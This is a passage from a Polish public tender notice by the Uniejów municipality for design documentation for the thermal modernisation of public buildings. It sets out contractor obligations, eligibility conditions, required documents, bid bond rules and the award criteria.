24.Wykonawca zobowiązany jest do uwzględnienia zaleceń i wymogów wynikających z danego programu pomocowego, z którego Zamawiający ubiega się o dofinansowanie, obowiązujących przepisów/dyrektyw Unii Europejskiej i przepisów prawa krajowego.
25.Wykonawca dokumentacji projektowej zobowiązany jest do zorganizowania i okazania dokumentacji projektowej w terenie wszystkim zainteresowanym stronom w terminie uzgodnionym z Zamawiającym. Protokół z okazania należy załączyć do dokumentacji. 
26.Wykonawca zobowiązany jest do dostosowania przedmiotu zamówienia do stanu prawnego obowiązującego w dniu przekazania opracowań zamawiającemu, jeżeli w czasie wykonywania opracowań akty prawne ulegną zmianie.
27.Wykonawca zobowiązany jest uzyskać wszelkie uzgodnienia, materiały oraz informacje niezbędne do prawidłowej realizacji przedmiotu zamówienia na własny koszt.
28.Opracowania mają służyć do przeprowadzenia postępowania przetargowego zgodnie z ustawą prawo zamówień publicznych w celu wyłonienia Wykonawcy zamówienia na wykonanie robót budowlanych polegających na termomodernizacji obiektów określonych powyżej.  
29.Projektant zgodnie z art. 29 ust 3 ustawy Prawo zamówień publicznych nie może przedmiotu zamówienia opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jeżeli mogłoby to doprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny. 
30.Wykonawca udzieli rękojmi za wady wynoszącej minimum  36 miesięcy od daty podpisania protokołu odbioru końcowego przedmiotu zamówienia. 
31.Wykonawca jest zobowiązany do każdorazowego uaktualnienia elementów przedmiotu zamówienia w  przypadku ich dezaktualizacji przed terminem ogłoszenia postępowania  o udzielenie zamówienia publicznego na wykonanie robót budowlanych dla danej inwestycji. Zobowiązanie wygasa po upływie terminu rękojmi za wady wynoszącym minimum 36 miesięcy od daty podpisania protokołu odbioru końcowego przedmiotu zamówienia. 
32.Wykonawca zobowiązany jest dostarczyć dokumentacje budowlano - wykonawcze uzgodnioną ze wszystkimi instytucjami, których akceptacja jest wymagana dla wykonania prac budowlanych określonych niniejszą dokumentacją.  
33.Do szczególnych obowiązków Wykonawcy należy:
 a) konsultacje z zamawiającym na każdym etapie projektowania dokumentacji, dotyczące istotnych elementów mających wpływ na koszty
 b) zastosowanie w projekcie rozwiązań standardowych skutkujących optymalizacją kosztów
 c) opisywanie proponowanych materiałów i urządzeń z zachowaniem przepisów wynikających z art.29-31 Prawa Zamówień publicznych tj. za pomocą parametrów technicznych tzn. bez podawania ich nazw, patentów lub pochodzenia. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia to wykonawca ( projektant) zobowiązany jest do podania co najmniej dwóch producentów tych materiałów lub urządzeń oraz określenia minimalnych wymagań dotyczących ich równoważności.
<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                a)Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art.67 ust. 1 pkt 6  ustawy Pzp.,  polegających na powtórzeniu  podobnych usług , zgodnych z przedmiotem zamówienia podstawowego, o wartości do 50 000,00 zł.
b) powtórzenie podobnych  usług w zamówieniu podstawowym  tj. opracowanie  dokumentacji projektowo- kosztorysowej oraz sprawowanie nadzoru autorskiego w trakcie realizacji robót.
c)zamówienie zostanie udzielone na warunkach takich jak zamówienie podstawowe.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 29/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku  <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku  <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                minimalne poziomy zdolności w tym zakresie- Warunek dla wszystkich zadań częściowych.:
c.1): w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał co najmniej 2 usługi polegające na opracowaniu dokumentacji projektowej na potrzeby termomodernizacji obiektu o powierzchni zabudowy minimum 200 m2. 
c.2) dysponują osobami, które będą wykonywać zamówienie lub pisemne zobowiązanie  innych podmiotów do udostępnienia tych osób, w tym: 
- co najmniej jedną osobą, posiadającą uprawnienia budowlane minimum w ograniczonym zakresie do projektowania w specjalności konstrukcyjno-budowlanej lub posiadającą inne tożsame uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiadającą zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z  2016 r. poz.  65)
- co najmniej jedną osobą, posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych które zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiadającą zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z  2016 r. poz.  65)
- co najmniej jedną osobą, posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych minimum w ograniczonym zakresie które zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiadającą zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z  2016 r. poz.  65)
Wykonawcy wspólnie ubiegający się o zamówienie powinni wykazać, że warunek określony  w ust 5.1. pkt 1  winien spełniać każdy z Wykonawców  wspólnie ubiegających się o zamówienie ( składających ofertę wspólną) natomiast warunki określone w pkt .5.1 pkt 2 spełniają łącznie 
Wykonawca może polegać na zdolnościach lub sytuacji innych podmiotów. W celu udowodnienia zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zobowiązany jest przedstawić zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 
Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informację o tych podmiotach w oświadczeniu stanowiącym załącznik nr 2 do SIWZ.  
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Niżej wymienionych dokumentów nie należy dołączać do oferty. Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie powiadomiony  odrębnym pismem o terminie i miejscu dostarczenia następującego  dokumentu:
 odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw  wykluczenia na podstawie  art. 24 ust. 5 pkt 1 ustawy, 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa każdy z Wykonawców 
Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentu  wymienionego  
2.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej: 
 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
 Dokumenty, o których mowa powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu; 
4. Dokumenty składane w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę  lub osobę/ osoby uprawnione  do podpisania oferty z dopiskiem  Za zgodność z oryginałem 
5.Oświadczenia, o których mowa w rozporządzeniu dotyczące wykonawcy i innych podmiotów, na których zdolnościach lub sytuacji polega wykonawca na zasadach określonych w art. 22a ustawy oraz dotyczące podwykonawców, składane są w oryginale. 
6. Dokumenty, o których mowa w rozporządzeniu, inne niż oświadczenia, o których mowa w ust. 1, składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem. 
7. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. 
8. Oferta, składane dokumenty oraz oświadczenia podpisane przez upoważnionego przedstawiciela wykonawcy wymagają załączenia właściwego pełnomocnictwa lub umocowania prawnego.
9 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Niżej wymienionych dokumentów nie należy dołączać do oferty. Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie powiadomiony  odrębnym pismem o terminie i miejscu dostarczenia następujący dokumentów:
1) wykazu wykonanych usług: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  w tym okresie, potwierdzający wykonanie usługi określonej w  Rozdziale V pkt 2 lit c1 SIWZ z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu
Wzór wykazu znajduje się w załączniku nr 4 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców 
2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.. Zakres ww. dokumentów musi potwierdzać spełnienie odpowiednio warunku określonego w rozdziale V pkt2 lit c.2 
Wzór wykazu znajduje się w załączniku nr 5 do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców 
3. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu, w stosowanych sytuacjach  oraz w odniesieniu do konkretnego zamówienia lub jego części polegać na zdolnościach  technicznych lub zawodowych lub sytuacji  finansowej  lub ekonomicznej innych podmiotów , niezależnie od charakteru prawnego łączących go z nim stosunków prawnych 
4. W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zamawiający żąda  przedstawienia zobowiązania tych podmiotów do oddania Wykonawcy  do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
5. W odniesieniu  do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, których wskazane zdolności dotyczą.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku  </div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wykonawca zobowiązany jest do przedłożenia następujących dokumentów:
1) Oświadczenie o spełnieniu warunków udziału w postępowaniu  
2) Oświadczenia  o niepodleganiu wykluczeniu z postępowania
2. Pozostałe dokumenty, składane przez Wykonawcę wraz z ofertą:.
1) Formularz ofertowy  wypełniony i podpisany  przez wykonawcę  
2)W przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach innych podmiotów: zobowiązanie (oświadczenie) innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia (złożone w formie pisemnej w oryginale). Powyższe zobowiązanie winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu  wskazywać jego rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu. W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia (tj. zdolności techniczne i zawodowe takie jak wiedza i doświadczenie, potencjał osobowy)  taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia w charakterze podwykonawcy. 
3) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: pełnomocnictwo (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii) 4) w przypadku składania oferty przez pełnomocnika Wykonawcy  pełnomocnictwo do reprezentowania wykonawcy przez pełnomocnika (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii)
5)  Wykonawca który powołuję się na zasoby innych podmiotów w tym osób fizycznych  nie będących pracownikami wykonawcy w celu wykazania braku istnienia wobec nich  podstaw do wykluczenia oraz spełnienia, w zakresie, w jakim powołuję się na ich zasoby, warunków udziału w postepowaniu składa także odrębne Oświadczenia dla każdego z tych podmiotów 
6) W przypadku wspólnego  ubiegania się o zamówienie przez wykonawcę, Oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie 
7). Jeżeli Wykonawca zamierza część zamówienia podwykonawcom na zdolnościach których polega , na potrzeby realizacji tej części, to należy wypełnić odrębne oświadczenia dla tych podwykonawców.
8) Wykonawca w  terminie 3 dni od zamieszczenia na stronie internetowej zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust 5. PZP przekazuje Zamawiającemu  oświadczenia o przynależności  lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust 1 pkt 23 ustawy PZP.  Wraz ze złożonym oświadczeniem, wykonawca może przedstawić dowody, że  powiazania z innym wykonawcą nie prowadzą do zakłócenia  konkurencji  w postepowaniu  o udzielnie zamówienia. 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert określonego w niniejszej SIWZ  
1.	Wadium należy wnieść w wysokości 
Dla części nr 1 1000,00 zł.
Dla części nr 2 1000,00 zł
Dla części nr 3 1000,00zł
2.	Wadium może być wniesione w pieniądzu, w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym oraz w gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j.: Dz. U. z 2016 r. Nr 359)
3.	Wadium wnoszone w pieniądzu należy wpłacić wyłącznie przelewem na rachunek bankowy Zamawiającego: 14 8557 0009 2005 0200 0130 0001  w takim terminie, aby najpóźniej przed upływem terminu składania ofert - określonym w pkt XI SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego w/w rachunek.
4.	Wadium wniesione w innej formie niż pieniężna należy złożyć w oryginale w kasie Urzędu Miasta w Uniejowie przed upływem terminu składania ofert w kopercie oznaczonej w następujący sposób: Wadium - przetarg na wykonanie usługi polegającej na opracowaniu dokumentacji budowlano - wykonawczych na potrzeby kompleksowej termomodernizacji obiektów użyteczności publicznej na terenie gminy Uniejów realizowanej w ramach zadania pn.: Termomodernizacja obiektów użyteczności publicznej   nie otwierać przed 24.01.2017  godz. 1030.
5.	Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy):
a)	ustalać beneficjenta gwarancji, tj. Gminę Uniejów
b)	określać kwotę gwarantowaną w zł (ustaloną w SIWZ)
c)	określać termin ważności (wynikający z SIWZ)
d)	być gwarancją nieodwoływalną, bezwarunkową, płatną na każde żądanie.

Uwaga!

Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium, jeżeli wystąpią przesłanki opisane w art. 46 ust. 4a i 5 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych), w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3 a, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń potwierdzających okoliczności, o których mowa w art. 25a ust. 1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej
6.	Do wadium wniesionego w formie poręczenia wymagania opisane w pkt. 5 stosuje się odpowiednio
7.	W przypadku nie wniesienia wadium na warunkach określonych w pkt. 1-4 Wykonawca zostanie wykluczony z dalszego postępowania, a złożona przez niego oferta zostanie odrzucona.
8.	Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych 
Oferent zobowiązany jest podać w ofercie dokładną informację odnośnie zwrotu wadium tj. adres banku, numer konta itp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Zabezpieczenie należytego wykonania umowy </td><td>20</td></tr><tr><td>Okres gwarancji na który Wykonawca przedłuża okres  rękojmi za wady </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
